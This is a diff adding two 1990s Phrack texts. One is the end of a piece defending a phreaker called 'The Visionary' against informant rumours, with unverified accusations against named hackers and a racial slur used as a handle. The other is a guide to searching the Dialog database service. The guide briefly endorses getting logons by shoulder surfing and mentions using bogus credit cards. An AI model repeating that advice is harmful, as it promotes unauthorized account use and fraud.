+ I'm gonna put you in jail.  Obviously I'm not the only one
+ who feels that way.
+
+ In all honesty, I could care less about this, but since Pat
+ submitted this file to Phrack, I am going to give it fair
+ treatment and publish it for him.]
+
+-----------------------------------------------------------------------------
+
+                      Visionary The Story About Him.
+
+
+This file is beeing published due to the wide spread rumors about a hacker known
+as The Visionary.  The reason behind the distribution of the file is to clear up
+a lot of misconseptionspeople have about this individual.  Those reading it are
+asked to keep an open mind.  Encluded in the file will be buffers from people
+who know The Visionary.  After reading it there is hope the rumors come to an
+end.
+
+
+     There have been a number of stories that people have brought up in relation
+to The Visionary.  So you will hear the truth in relation to each story.  Many
+have been spreading rumors without getting the facts first, so therefore a lot
+of stories going around were either overdramatised or without foundation.
+
+
+     The first thing that originally started the rumor was an event which
+happened in the mid 1980s.  The Visionary had been modeming for just over a year
+back then.  He as well as several other people had become associated with some
+other local hackers.  The local hackers in question were, Oedipus Rex who ran a
+board known as The Apple Tree in 305.  The other two were known as Unknown
+Soldier of LOD and a guy known as The Technician.  There were a couple others
+involved with them but the identity is not known.  Anyway they became angery at
+the other hackers I knew and started unnecessary problems.  Unknown Soldier
+giving out the number to his other friends in order to harass a kid known as The
+Insider.  Every time Insider had his number changed to a nonpublished one,
+Unknown Soldier loged into Cosmosand using his knowledge obtained the new number
+At the same time Oedipus Rex along with his friends were pulling other serious
+things on me as well as the local people I knew.  1.  He would harass me and my
+parentsall times of the night.  On two ocations he was seen driving in my
+neighborhood on the same night someone shot my front windows out.  It was shown
+the Unknown had logged on TRW and obtained the credit history belonging to my pa
+parents as well as otherpeople's parents.  On one ocation Oedipus Rex with a few
+others had convinced a few of my friends to meet them at a remote location
+after a hacker meeting.  When this happened OedipusRex sprayed the people with a
+substance known as mace.  This amoung other things like, property damage, credit
+information being changed and other acts of anarchy were performed against us.
+I The Visionary don't know why they started on me as well when I did nothing to
+diserve this.  Things come to ahead when The Unknown Soldier bragged to one of
+us that he could get confidential information on their parents.  The kid he was
+bragging to went to his parents because there was already problems.  His father
+got the local Bell operating company involved and things progressed from there.
+Inside five months Unknown Soldier was busted and charged with illegal entry
+into Suthern Bell's computer and CBI credit bureau.  He had to pay $1,500 to
+both Bell and CBI indamages.  It's not known how much the state fined him.  It
+was shown that The Visionary's parents credit history was effected in a negative
+way by this guy.  After the bust the local authorities spoke to The Visionary in
+regards to this guy.  Now any hacker out therewith any common sense can
+understand why Visionary did not hold back when asked about these guys.  As any
+hacker knows nobody should use their knowledge against someone else.  Especially
+if they are going to use the parents as the target.  Visionary was more than in
+his rights to do what he did.  And due to the fact this story was told without
+the entire facts known it has been twisted into a gross rumor.
+
+
+     For about two years after that Visionary dropped out of the seen due to
+person reasons.  In late 1987 he returned back in the seen as The Traxster.  At
+there were no rumors until Lex Luthor of The Legion of Doom found out about him.
+Than the rumors started again.  "I don't know why people brought up the event
+which happened years ago when it was long and forgoten," is one thing The
+Visionary said.  From 1987 throughout 1988 a lot of people always spoke of
+Visionary back than known as The Traxster.
+
+
+     In the last four years certain things have been brought to light regarding
+Visionary.  These events were generally recordings of Visionary either admitting
+to being a narc, or one was of him talking to a suposed MCI Security agent.
+
+
+     When you read the following accounts, remember logic will play a big part
+in not onlyunderstanding the truth behind them, but you will find out that
+Visionary's side is a lot more credible than of the rumors.
+
+
+     The following is Visionary's own account in relation to the MCI tape that
+a lot heard but don't know the facts behind.  "It was during the early of sumer
+of 1988 when I had an interesting incounter with a hacker posing as an MCI
+Security agent.  I didn't know it at the time but someone was oviously playing a
+large trick on me as it was recorded either by the hacker or a person on his
+threeway.  Those reading this keep in mind I am going from memory and I may not
+be able to recall every small detail.  I will say this much, I have the
+tape of the event that I obtained and anyone who listens to it will know that
+is no MCI agent I am talking to.  I had one ocation where I was due to meet
+someone on a loop.  Which loop and who I was supose to meet I don't recall.
+Anyways I had been on a loop waiting for another hacker.  After a minute a guy
+comes on the loop.  Upon asking his handle he said he was from MCI Security.
+At first I laughed and asked who he was kidding.  I mean people MCI isn't going
+to call a loop and identify themselves as such.  Well I decided after he
+insisted very sincerely he was MCI, I decided to play along.  I made up the
+story that I was someone that delt with telco security and wouldn't mind talking
+to him.  We started talking about things like ANI and different services.  Keep
+keep in mind I know he wasn't MCI at all.  The conversation lasted around thirty
+to fourty-five minutes.  I am able to give some idea of time beings I have the
+tape and have listened to it.
+
+
+     After the event I forgot about the entire thing.  It wasn't until a few
+months later when I heard about the recording with me talking to MCI.  At first
+I was extremely puzzeled by this news.  Than I heard samples of the recording
+and instantly knew what it was about.
+
+
+     Now when listening to the tape you will find a couple things very strange
+about it.  When people told me about it, I was told that someone had remobed my
+line, someone had used LMOS and other outlandish things.  When listening to the
+tape the first thing that is ovious is the suposed MCI guy I am talking to is
+much louder than me.  I mean you can hear him booming compared to my side of the
+conversation.  The second thing is you hear music in the background.  The last
+fact mentioned is not important but could be if you listen to it.
+
+
+     This tape caused a lot of people to have second thoughts of associating
+with me.  When one hears it, usually it sounds pretty real if you make a quick
+judgement.  People such as Phiber Optic, Zod of MOD and even a local friend of
+mine who knew me for a long while were convinced by it.  I feel that either
+someone had either played a bad trick on me, or it was a situation where two
+people happened to find me and I become an unfortunate victom.  At the time the
+rumors had pretty much stopped and if the tape hadn't come about I suspect
+things would have blown over.
+
+
+     The second event involving me on tape, was with me and Doc Haliday.  It was
+in the fall of 1990, during the time of the 404 bridge.  The rumor about me had
+still been going on due to the MCI tape.  One of the hackers that happened to
+call the bridge was Doc Haliday.  Doc Haliday is a somewhat wellknown hacker who
+associates with people in the Texas area.  He was known to frequent a HP board
+known as Unholy Temple, and he has also written for Phrack.  One particular
+ocation, Visionary was on the 404 bridge he met Doc Haliday.  Doc Haliday called
+him shortly after they met on the bridge.  The first conversation was about the
+rumors he heard about Visionary and his thoughts on them.  Haliday than related
+to Visionary that he didn't aprove of a lot of hacker activity now a day.  He
+said in so many words the stuff hackers seemed to do was extremely wrong.  This
+statement didn't hit Visionary quite right, due to the fact Doc Haliday had been
+into hacking a long time.  Doc Haliday's next statement made Visionary feel
+there was more  to him than met the eye.  "I don't aprove of those who use
+access devices," stated Doc Haliday to Visionary.  Now anyone reading this may
+know it, but the term access devices or access codes is the legal term the
+authorities use in court cases.  When Visionary heard this, the first signs of
+dout about Doc Haliday began.  "When he used the term access devices, an allarm
+bell went off in my head," was Visionary's words.  The next day, again him and
+Doc Haliday had another conversation.  This is when Visionary had his douts
+confirmed.  Haliday started out by informing The Visionary of an investigation
+on the 404 bridge.  He said a friend of his from The Secret Service had warned
+him, due to an inpending bust of a number of people.  This news shocked
+Visionary like a slap in the face, and things started getting stranger.  Doc
+Haliday explained there was a lot of monitoring of the bridge, as well as a
+pending investigation on Super Niggar.  At this point Vision made a decision to
+play his Trump card.  Slowly Visionary was able to get Haliday to admit that he
+did next to nothing illegal any more.  When asked Haliday gave an impression he
+was not against informents but was open to it himself.  This is when Visionary
+began to lead Haliday to the belief that he was an informent.  Haliday bought
+the bate hook line and sinker.  He told Visionary all about the dealings with
+Secret Service in the past, and how he had made six federal cases for them thus
+far.  Visionary made up a story to the effect of him beeing involved in simular
+activities.  The entire thing on Visionary's part was to confirm his own douts
+regarding Haliday.  However one thing happened which screwed up Visionary.
+Doc Haliday had been recording the entire conversation.  After he hung up from
+Visionary, he proceded to play it to everybody.  His reason for saying what he
+said was to bolshit Visionary into admitting to narcing.
+
+
+    All of y     The people that heard the tape were not able to hear the entire
+thing.  Haliday only played segments and made himself the big social enginer.
+Some of you out there may ask, who should believe?  Well look at it this way.
+if you hear the tape or hear Haliday's side it sounds like he is bolshitting
+Visionary.  However again like the other time to many things don't tigh
+together.  First off Visionary, if he was an informent would not admit to
+anybody as such.  It may seem to some that a confidents was built but Visionary
+would not be that stupid.  Remember people he has a lot of rumors go around
+about him.  A couple other things come into play here.  Doc Haliday was a very
+smart and carful individual.  He didn't associate with any of the normal crouds,
+nor did he even associate with most better hackers.  So, ask yourself, why did
+he go to such length to expose what he thought was a narc?  Visionary didn't
+even talk to anyone Haliday knew nore did Visionary pose a threat to Haliday.
+A major thing all of you will remember, is Doc Haliday is part of the security
+firm known as Comceck in Texas.  This is not mean much on one hand, but Haliday
+is involved with computer security.  Visionary was bolshitting Haliday and when
+looking at the situation the truth speaks for itself.  Any of the higher up
+hackers don't concern themselves with such matters of a narc.  They don't give
+two shits about lamers, yet Haliday tried to convince all of them with his
+tape.
+
+
+     Thus far you have read the main three reasons Visionary has had the
+constant rumor which persists about him.  Now we will cover some of the little
+reasons that, may not deal with tape recordings, can be misunderstood as fact.
+One must take into consideration that Visionary had to put up with a lot of shit
+due to the rumors, and he had to do some interesting stuff to get by.  One
+thing he did, was to let certain hackers think he was a narc.  All of you out
+there will ask why would he do this?  Well it's simple.  Visionary ran acrossed
+some people that it was to his advantage to let them believe anything.  One
+case with the members of a group known as MOD.  MOD was known by many to harass
+a lot of people.  They had heard about Visionary, and believed that to harass
+someone in his line of work would be the death of them.  Anotherwords, if you
+are a neighborhood vandle, your less likely to bother an authority figure.  To
+them Visionary was an authority figure.
+
+
+     That was not the only ocation Visionary had let people believe he was
+an informent of some kind.  Visionary found it was easier in some instances
+if certain people were set on believing the rumors, that they were better off
+deceived in that way.  Certain people, Visionary found would trust him more if
+they thought he worked for a certain ld service.  One particular instance,
+involved a local friend of Visionary's.  The kid, had heard a lot of rumors.
+Visionary had got him started in the shit, but what convinced the kid was the
+famous MCI tape.  Visionary, finally told the kid he worked for MCI, and no
+government agency.  When the kid in question heard this he was able to talk
+to Visionary easier.  The logic here, is the kid didn't know what Visionary did.
+If he did work for the FBI or Secret Service, he felt in danger by that.  But
+As the local kid didn't use MCI it made him trust Visionary.  See people there
+was the same reason Visionary told several people that.  People, like that kid
+as well as others didn't care what Visionary did.  Also Visionary at times
+would bolshit someone into thinking he was a government narc to get a reaction.
+"You would be suprised as to the number of people who actually wanted to narc,"
+was Visionary's statement.
+
+
+     Over the years Visionary has been the target of many a accuation.  Many
+of those who know Visionary, know he is no narc, and never has been.  Visionary,
+feels that people have been to quick to judge him, and he asks to just keep
+an open mind.  The rumors about him are bolshit, as a number of facts will show.
+The facts which are a lot more credible stand a lot stronger than the rumors.
+1.  Many people Visionary has associated with have not been busted.  This
+statement may not mean a thing, but it's going to be ovious if he is a narc a
+lot of his friends would go down.  Visionary talks to everybody, therefore  you
+know that he will know some who have been busted.  But the number are few, and
+when you talk to several who have known him, they will admit no Secret Service
+or FBI have shown up to get them.  Logic to some may not dictate reality, but
+it makes sense and has proven to be true.  Take a look at people like, Fourth
+Reich, Gandalf, Lord Sigath, Hellmaster, The Phlaw, Renegade and Weirdo.
+All the people have been around for a long time, and associated with Visionary.
+So ask yourself, why, if Visionary is a narc are they not busted?  The answer
+is plane as day.
+
+     There is one major thing that needs to be covered in this file.  The event
+I am refering to happened during the sumer of 1990.  It waa around the time of
+the 702 bridge.  There was a guy going by the handle of Storm Shadow around.
+Storm Shadow lives in the New York area and Storm ShadowVisionary first knew
+Storm Shadow in late 1989.  Some people that knew this guy would say he was a
+bolshit artist, who didn't come through.  Storm Shadow had aproached several
+people he knew with a deal involving information providers.  The deal was he
+worked for a private investigator.  The type of work Storm Shadow clamed to be
+doing was nonhacker related cases.  He clamed it was just people he needed to
+obtain records on various things such as, Social Security records, local usage
+dialing records, CBI and TRW records, LD records as well as other things.  He
+made offers to a number of people like Visionary, Toxic Roadkill, Code of Honor,
+Nemesis, Joe Friday, Billy The Kid as well as others to work for him.
+When he tried to get Visionary involved, he didn't have a lot for it.  Storm
+Shadow asked Visionary to find people to help him out.  Visionary introduced
+Storm Shadow to a few people explaining what Storm Shadow's problem.  At this
+point Visionary just left it up to the people.  One thing that should be
+understood, is Visionary had no notion that Storm Shadow wasn't anything beyond
+what he said.  Some of the people like Toxic Roadkill, Joe Friday and Code of
+Honor did do some work for Storm Shadow.  This thing went on for a few months
+ooff and on from late 1990 into 1991.
+
+
+     Recently certain things came to light regarding Storm Shadow.  In the fall
+of 91, there were a few people busted in the New York area.  Storm Shadow and
+a guy known as Renegade Hacker were among the people.  It appears Storm Shadow
+is a witness for the government against some of the others busted.  It's
+been thought by a couple, that Storm Shadow was gathering evidence against the
+people he tried to get working for him.  This in itself didn't make Visionary
+look very good, as he introduced Storm Shadow to a number of people.  You see
+once again, Visionary is going to get blamed wrongfully for something not in
+his control.
+
+
+     Gentleman, after reading the accounts above you may understand Visinary's
+anger when someone calls him a narc.  Rather by his own falt, or just the
+manor of things, Visinary has not been treated fairly by the HP communinity.
+It's not fair that people look at him differently.  Just because he may not be
+like everyone else is no excuse.
+
+
+     Recently, people have been spreading a lot of rumors without hearing
+Visionary's side.  Recently, people will produce what they call evidence without
+allowing him to explain.
+
+
+     A lot of statements, and information have been passed among people, that
+when you look at it means nothing.  People say they've got Visionary on tape
+admitting he's a narc.  Visionary has bolshited people before, and the plane
+fact is someone was taping him.  People will bring up the fact Visionary has not
+been busted.  Just because the guy hasn't been busted doesn't mean anything.
+Visionary is not always active, therefore isn't always at risk.  Some people t
+will wonder why someone Visionary's age, 27 years old is in this stuff.  Some of
+the most wellknown hackers are in their twentys, and some are even in the
+early thirtys.
+
+
+     One major fact, that has been brought up about Visionary will be addressed
+now.  Some people, with good reason, may want to know the reason behind this
+major fact regarding Visionary.  One question, that has come up from time to
+time, is what does Visionary specialize in relation to hacking.  Some wonder
+what Visionary does in the hack/phreak world.  Gentleman remember Visionary is
+handicapped as well as visually impaired.  Being blind kind of makes his
+resources kind of limited in reading files.  He uses an Echo Speach Card with
+limited software.  Not just any program will work with the speach card.  The
+Echo takes text and speaks it OK to a point.  But when reading stuff from a
+text file, the words are not spoken properly.  Some symbols aren't pronounced
+therefore making things even harder.  When on a Unix system it's rough because
+the commands aren't spoken like they should be.  The main thing Visionary is
+good at is the social enginering aspect.
+
+
+     Let's keep in mind no matter how someone goes about learning, it does make
+them any different different.  Visionary should be looked upon as a shady
+character just because he may be curious.  He has to learn by asking questions,
+where all of us take the ability of reading for granted.
+
+
+    The reason this file is being widely spread, is in hopes some of the
+slandering of Visionary's name can stop.  "The computer and the telephone are
+my best sources of entertainment.  I enjoy hacking as a hoby and do not
+appreciate the continuing rumors people spread."  fter
+
+
+    The main thing here, is every time some strange event happens in the seen,
+people point the finger at Visionary.  Let's stop the shit, let's stop assuming
+he's the guilty one.  Recently Visionary was blamed for a bunch of people being
+on Alliance Teleconferencing.
diff --git a/phrack44/18.txt b/phrack44/18.txt
new file mode 100644
index 0000000..395c581
--- /dev/null
+++ b/phrack44/18.txt
@@ -0,0 +1,997 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Four, File 18 of 27
+
+****************************************************************************
+
+                  Searching the Dialog Information Service
+                               By Al Capone
+                      (alcapone@mindvox.phantom.com)
+
+     This file will show you how to use the Dialog Information Service.
+It is divided into the following parts:
+
+<> --- Background Information
+<> --- Accessing Dialog
+<> --- What to do when you're in
+<> --- Searching and Search Strategy
+
+     As loyal Phrack readers may recall, there have been two articles
+written about Dialog already: Control-C wrote "Inside Dialog" in Issue
+9 and much later Brian Oblivion wrote "The Complete Guide to The DIALOG
+Information Network" in Issue 39. Why another one? The online world
+changes so rapidly that things written just a couple of years ago can
+be out of date today. What differentiates this file from its two predecessors
+is that this file is: less 'manual derived', current (as of 11/93),
+more hands on, and hopefully is easier to read and put to immediate use.
+
+     To obtain additional information about Dialog contact:
+
+                  Dialog Information Service Worldwide Headquarters
+                  3460 Hillview Avenue
+                  P.O. Box 10010
+                  Palo Alto, CA 94303-0993
+                  Phone: 1-800-3-DIALOG (800-334-2564)
+
+
+<> Background Information
+-------------------------
+
+"The United States is turning from an industrial age nation into
+an information age nation,"  U.S. Senator Gary Hart, The Tonight
+Show, 1993.
+
+     From Big Brother creating dossiers on subversives to credit
+reporting agencies determining whether or not you get your credit
+card application approved, it all boils down to the more you know,
+the better you are able to succeed in society.
+
+     Following through a hacker progression, huge databases have
+amassed providing online access to a seemingly infinite number of
+sources used for anything imaginable.  Lawyers can access these
+databases to research such things as precedents for court cases. A
+graduate student trying to earn his or her masters degree can gain
+access to research a thesis, companies can get information on
+competitors, and so on. Databases are distributed into two categories:
+Research and Entertainment.
+
+     Gaining prominence in the early 1980's, entertainment databases
+were comprised of the big two: The Source and Compuserve. Another
+prominent service, the Dow Jones News Retrieval Service was part
+research and part entertainment.  A few other less significant databases
+also existed at this time.
+
+     The Source was a subsidiary of the investment firm of Welsh,
+Carson, and Stowe.  It provided some seven hundred and fifty features
+and services including electronic mail.  Investment features included
+a discount brokerage firm, and a full range of stock, bond, and
+commodities information, with an option to search portfolios.  It also
+allowed you to search other fellow users by location, account number,
+or interest.  The Source was subsequently bought out by Compuserve
+and was shutdown on August 1, 1989.
+
+     Compuserve is a division of H&R Block. It is the largest
+service worldwide offering some four hundred thousand subscribers a
+variety of news and financial information.  It also offers access
+to Valueline and the Standard and Poor databases, which are online
+business references.  It also has online games and a travelling service.
+
+     The Dow Jones News/Retrieval is a part of the Wall Street Journal
+and provides online abstracts of printed papers published by Dow
+Jones and Co.  It now includes profiles of over forty six hundred
+companies and has diversified to provide sports coverage.
+
+     Today, most of you are aware of the myriad of other entertainment
+online services such as Genie, Prodigy, America OnLine (AOL), etc. All
+of these so called entertainment services have made attempts at
+offering various business and research services to their users. Its
+interesting to sit back and watch how each one tries to out-do the
+other. You will find that some databases are offered through some of
+these entertainment services as well as dialog and perhaps other
+commercial services. Be aware that the costs may differ substantially
+among them for the same exact database. If you are paying for access, be
+sure to shop around if the particular database is popular.
+
+     If you travel to your local university library you will notice
+computer databases to which you can access such things as doctoral
+dissertations (get brownie points by telling your professor how
+interesting his/her thesis was), medical research (look up that newly
+acquired disease that your doctor mumbled that you now have), even
+national newspaper articles. This is just another source of information
+at your disposal (aside from books that is).  Popping up more and
+more in libraries are "fee based research services".  These are simply
+professional librarians who use research databases to retrieve the
+information you are too ignorant or stupid (or don't have enough time)
+to retrieve yourself. Fees range from their cost only (ie, online charges)
+to upwards of $100. per hour of their time spent PLUS any online
+charges.
+
+     As you can probably deduce, it would be cost effective to use every
+possible free source of information before turning to online searchers.  I
+recommend exhausting all the in-library databases before going online
+simply because the in-library databases are usually available on
+CD-ROM and you are not charged an hourly rate to use it. And don't
+forget about all those free Internet FTP sites, Gopher, WAIS, WWW, and
+even usenet!  Most librarians are just starting to pay attention to and make
+use of the Internet. However once you have read this article you
+will be well versed on one of the major databases that is being used by
+these research services.  If you run into an online database
+in your library, I suggest that you know what you are doing, as
+librarians are very skeptical due to the fact that you are using their
+money to do your searching.
+
+     Running a research service seems to be a good idea.  Not
+only does it provide a "legal" form of hacking to satisfy your
+thirst for information, there is definitely a substantial amount of
+money to be made.  Entrepreneur magazine lists it as being in the top
+ten of prospective business opportunities.  You are professionally
+known as an information broker, a degree in Library Studies (a
+traditional four year degree) helps, and if you don't decide to pursue
+the research angle, you could then become a librarian (how exciting).
+
+     One of the research databases commonly used is the Dialog
+Information Service.  Dialog is a subsidiary of Lockheed Missile and
+Space Corporation.  It provides access to more than three hundred
+databases containing over one hundred million records.  The
+significance of this service is that it joins all 300+ databases
+together, you can skip from one database to another simply by
+'beginning' the database.  In the past, the user would have to
+individually call each database and pay an exorbitant charge to
+use it.  Dialog eliminates this and keeps all the databases
+together.  Because of the vastness, all sources are summarized
+with keyword searches.  Dialog has substantial signup charges
+($295. last time I asked them) in addition to the fact that
+each individual database charges an hourly rate.  Each rate varies
+according to things like the relative importance of the topic,
+cost to put the information online, and the main determining
+factor: what they think the users will pay. Some database
+providers seem to defy any logical reasoning as to how they
+determined the cost to access their information.
+
+  Dialog can be accessed in about a dozen different ways.  It is
+available through Westnet, Wangpac, Dunsnet, IBM Information Network, and
+TWX-TELEX.  The following chart lists some other alternatives along
+with connection rates:
+
+               Ways to Access Dialog with Connection Rates
+                               Table 1
+
++--------------------------------------------------------------------------+
+|         Service                           Rate per Hour (U.S.Dollars)    |
+|         -------                           ---------------------------    |
+|                                                                          |
+| Dialnet Direct Dial (Palo                                                |
+|   Alto Dialnet Nodes).................................$ 4.00             |
+|                                                                          |
+| Dialnet-In Watts (Direct 800#)........................$24.00             |
+|                                                                          |
+| GEIS-Marknet *........................................$25.00             |
+|                                                                          |
+| GNS (Global Network Services -                                           |
+|   BT Tymnet) **.......................................$12.00             |
+|                                                                          |
+| Internet Gateway..(ANSnet)............................$ 4.20              |
+|                                                                          |
+| Journal of Commerce (JOC and                                             |
+|    KRU Network) ***...................................$24.00             |
+|                                                                          |
+| Sprintnet (Formerly Telenet)..........................$12.00             |
+|                                                                          |
+|                                                                          |
++--------------------------------------------------------------------------+
+*    = Available for users in Australia, New Zealand, Hong Kong, Singapore,
+       and the Philippines.
+**   = Available in Europe.
+***  = Available in the Far East and Asia.
+
+
+<> - Accessing Dialog
+---------------------
+     The following three scenarios will show you how to log in
+to Dialog to begin your searching. [] denunciates what you
+should type in:
+
+1. - Accessing Dialog through the Internet via the telnet command:
+------------------------------------------------------------------
+
+$ Telnet dialog.com
+
+DIALOG INFORMATION SERVICES
+PLEASE LOGON:
+?XXXXXXXX [Enter the Dialog Usernumber]
+ENTER PASSWORD:
+?XXXXXXXX [Enter the Dialog Password]
+
+You're In!
+
+2. - Accessing Dialog through Tymnet
+------------------------------------
+[a]
+please log in:[dialog]
+DIALOG: call connected
+DIALOG INFORMATION SERVICES
+PLEASE LOGON:
+?XXXXXXXX [Enter the Dialog Usernumber]
+ENTER PASSWORD:
+?XXXXXXXX [Enter the Dialog Password]
+
+You're In!
+
+3. - Accessing Dialog through Sprintnet
+---------------------------------------
+[Enter]  [Enter]  [Enter]
+TELENET
+123 45K
+@ [41548]
+415 48 connected
+DIALOG INFORMATION SERVICES
+PLEASE LOGON:
+?XXXXXXXX [Enter the Dialog Usernumber]
+ENTER PASSWORD:
+?XXXXXXXX [Enter the Dialog Password]
+
+You're In!
+
+     Here let me say a few things about getting a correct
+logon/password combination.  In order to familiarize yourself
+with the system, Dialog gives you a starter kit which includes
+your legit logon/password, along with some other perks like some
+free online time.  This online time can be used the minute you
+get your starter kit.  You may also illicitly obtain a correct
+logon/password combination using such an elaborate technique as
+looking over the shoulder of the person typing it in (shoulder
+surfing).
+
+     Of course Dialog will immediately revoke the 'hacked' account the
+minute that the "scheme" is uncovered, but at least you will have by then
+done your research and quietly slipped away.  Keep in mind that network
+nodes send port identifiers and if you are using a bogus credit
+card, then you might be in some hot water should they decide to
+track you down. It is assumed that if you intend to gain unauthorized
+access, you are somewhat versed in the various methods to negate
+the 'tracing' capability of the network(s).
+
+     Dialog offers 6 'free' accounts to prospective and current
+subscribers.  These are restricted accounts which provide access
+to their ONTAP training databases. There are two to three dozen
+databases which they scale down to include a fraction of the
+number of records and/or contain dated records from years ago. You
+search these databases the same way as the full-scale ones.  The
+purpose is for you to verify your search strategy, and once you feel
+confident that your search strategy will pull up the info you want
+(not too many records yet not too little), you use your dialog
+account to access the same database at the going rate. This way,
+you don't lose lots of cash if you screw up, because you made all
+your mistakes using the free accounts. Since I use the free accounts
+on occasion, I don't think it would be a good idea to list them in
+this file. Suffice it to say that Dialog is happy to provide the
+phone number to you that has the pre-recorded userid and password
+combinations for the ONTAP accounts. Note that these passwords are
+changed every month, with new passwords being provided at the first of
+each month and that only one person may use each account at a time.
+
+     Also note that Dialog occasionally offers a 'free file of the
+month' in which you use your normal Dialog account to do searches in
+the particular database. They usually allow you to rack up to $50 or
+sometimes an hour's worth of search charges -- I guess that is Dialog's
+definition of 'free'. The only charges you pay when you access any free
+files of the month are telecommunications charges (see Table 1 above).
+Once you leave the free file of the month, you will start to incur
+normal Dialog online time charges.
+
+
+<> What to do When You're In
+----------------------------
+
+     Once you have gained access to Dialog the system will show
+you something like this:
+
+Welcome to DIALOG
+Dialog level 29.01.04B
+Logon file227 22may93 12:27:30
+
+COPR. (c) DIALOG INFORMATION SERVICES, INC. ALL RIGHTS RESERVED.
+NO CLAIM TO ORIG. U.S. GOVT. WORKS.
+***Equal Employment Opportunity (EEO) Data Available in CENDATA
+   Menu 22.7
+
+***Preformatted Patent REPORTS are now available for File 28,351
+
+New: CINCINATTI/KENTUCKY POST (PAPERS) (File 722)
+New: ST. PETERSBURG TIMES (File 735)
+New: WICHITA EAGLE (PAPERS) (File 723)
+
+>>> Enter BEGIN HOMEBASE for Dialog Announcements <<<
+>>>       of new databases, price changes, etc.   <<<
+>>>        Announcements last updated 07may93     <<<
+
+SYSTEM:
+
+     The "SYSTEM:" prompt directs you to pick a file.  A file in
+this case is the number to a database.  In the above welcome message
+you will notice that the St. Petersburg Times appears in File 735.
+This simply means that if I wanted to look up an article in the St.
+Pete Times, I would type in "b735" at the "SYSTEM:" prompt.  The "b"
+stands for begin, as if you are beginning in that database.  Like I
+said earlier, each database charges a different rate which typically
+depends on the 'importance' of the information.  Therefore, it will
+probably charge more for biochemistry information than for newspaper
+articles. The following list shows costs for the some of the "A" databases
+in the Dialog system.
+
+     HOMEBASE is the Dialog tutorial.  It provides all sorts of help
+needed by the beginner hacker...errr user.  Homebase lists announcements,
+dates and locations of training seminars ($70 to $140 for half/full day
+seminars, I have been to a few for dialog and some of their individual
+databases and highly recommend going especially if they are offered for
+free), and lists dialups in various area codes.
+
+               Individual Dialog databases by the Letter A
+                               Table 2
+
++--------------------------------------------------------------------------+
+|  File Number  |          Database Name         |  Rate per Minute/Hour   |
+|---------------|--------------------------------|-------------------------|
+|    15         |           ABI/Inform           |         2.20/132.00     |
+|    88         |         Academic Index         |         1.40/84.00      |
+|    108        |         Aerospace Database     |         1.50/90.00      |
+|    163        |           AGELINE              |         1.00/60.00      |
+|    581        |         Agribusiness U.S.A.    |         1.60/96.00      |
+|    10         |         Agricola 1979-present  |          .75/45.00      |
+|    110        |         Agricola 1970-1978     |          .75/45.00      |
+|    203        |         Agris International    |         1.00/60.00      |
+|    306        |     The Agrochemicals Handbook |         4.41/265.00     |
+|    157        |         AIDSline 1980-         |          .60/36.00      |
+|    708        |       Akron Reacon Journal     |         1.60/96.00      |
+|    38         |     America:History and Life   |         1.08/65.00      |
+|    625        |     America:Banker Full Text   |         2.00/120.00     |
+|    Banknews   |     American Banker News       |         2.00/120.00     |
+|    460        |     American Library Directory |         1.25/75.00      |
+|    236        |American Men and Women of Scien.|         1.58/95.00      |
+|    305        |        Analytical Abstracts    |         2.66/160.00     |
+|    257        |     API Energy Business News   |         1.60/96.00      |
+|    897        |     API Energy Business News   |         1.60/96.00      |
+|    354        |     APILIT (non-subscriber)    |         3.08/154.00     |
+|    954        |     APILIT (Subscriber)        |         1.83/110.00     |
++--------------------------------------------------------------------------+
+
+     This list continues for some fifteen more databases (those
+that start with the letter A).  If I were to list the entire database
+list, this covers some ten pages of documents, not withstanding
+that it's constantly being revised/updated.  If you look at my example
+in logging on, the St. Petersburg Times was recently added as a database.
+This would not reflect in my database list as I have compiled, outdating
+it before I even listed it.  I suggest that you contact Dialog at the
+phone/address at the beginning for an updated list of databases.  The
+document is called "Price List".  However Dialog has online an entire
+list of all its databases.  This list is located in File 411.
+
+     Also contained in this list is the Dun and Bradstreet databases
+(Files 514 through 522).  Dun and Bradstreet provides corporate
+information to subscribers.  It can be used for anything from
+competitive intelligence on another business to credit reports on
+prospective clients to background intelligence.  File 519 contains full
+disclosure on financial information on a company.  Each record costs $106.
+(at this time).  The other databases are significantly cheaper, but not
+by much. The way D&B gathers this information is they send out employees to
+"interview" various corporations and their officers and simply translate
+the info into a record which they then market.  One thing about each database
+is that they each contain their own language within the general Dialog
+language (which will be discussed further in this file).  In Dun and
+Bradstreet you can search by company, PIC and SIC codes (these are simply
+manufacturing categories which the searcher can use to find companies.
+Example: if I wanted to find the top ten companies in long-distance
+services, I could use a PIC code), or various other categories.
+
+     The following is an exploration of Phrack's old buddies, BellSouth:
+
+$ s dp=10-667-8006
+$ t s2/co/all
+
+(The "dp" command displays all subsidiaries of a company (only the
+direct subsidiaries, the ones that report directly to BellSouth.  The
+result is the following:)
+
+Company
+Name
+--------------------------------
+
+Mobil Communications Corp
+Bellsouth DC Inc
+American Cellular Communications
+Bellsouth Enterprises Inc
+Bellsouth Financial Services
+Bellsouth Advertising & Publishing
+Mobile Communications Corporation
+Mobilecomm of Nashville, Inc.
+Bellsouth Telecommunications
+
+Here is the record disclosure from File 516: D&B Market Identifiers:
+
+2655560   DIALOG File 516:  D&B Duns Market Identifiers
+Bellsouth Corporation
+1155 Peachtree St Ne
+Atlanta, GA 30367-6000
+
+TELEPHONE: 404-249-2000
+COUNTY: Fulton      MSA: 0520 (Atlanta, GA)
+REGION: South Atlantic
+
+BUSINESS: Telecommunications Services
+
+PRIMARY SIC:
+ 4813       Telephone communication, except radio
+  48130000   Telephone communication, except radio, nsk
+  48130102   Local telephone communications
+  48130103   Long distance telephone communications
+  48130104   Voice telephone communications
+
+SECONDARY SIC(S):
+ 4812       Radiotelephone communication, nsk
+  48129901   Cellular telephone services
+  48129902   Paging services
+ 2741       Miscellaneous publishing, nsk
+  27410304   Directories, telephone: publishing only, not printed on site
+ 5065       Electronic parts and equipment, nec, nsk
+  50650100   Telephone and telegraphic equipment
+  50650103   Telephone equipment
+
+LATEST YEAR ORGANIZED:  1983   OWNER CHANGE DATE:          NA
+STATE OF INCORPORATION:  GA    DATE OF INCORPORATION: 10/13/1983
+ANNUAL SALES REVISION DATE: 04/19/1993
+
+                         LATEST             TREND             BASE
+                           YEAR              YEAR             YEAR
+                                           (1991)           (1989)
+
+SALES          $ 15,201,600,000   $ 14,445,500,000   $ 13,600,000,000
+EMPLOYEES TOTAL:         97,100             96,975            102,000
+EMPLOYEES HERE:             982
+
+  SALES GROWTH:  6   NET WORTH: $ 11,996,800,000
+  EMPLOYMENT GROWTH:  -5
+
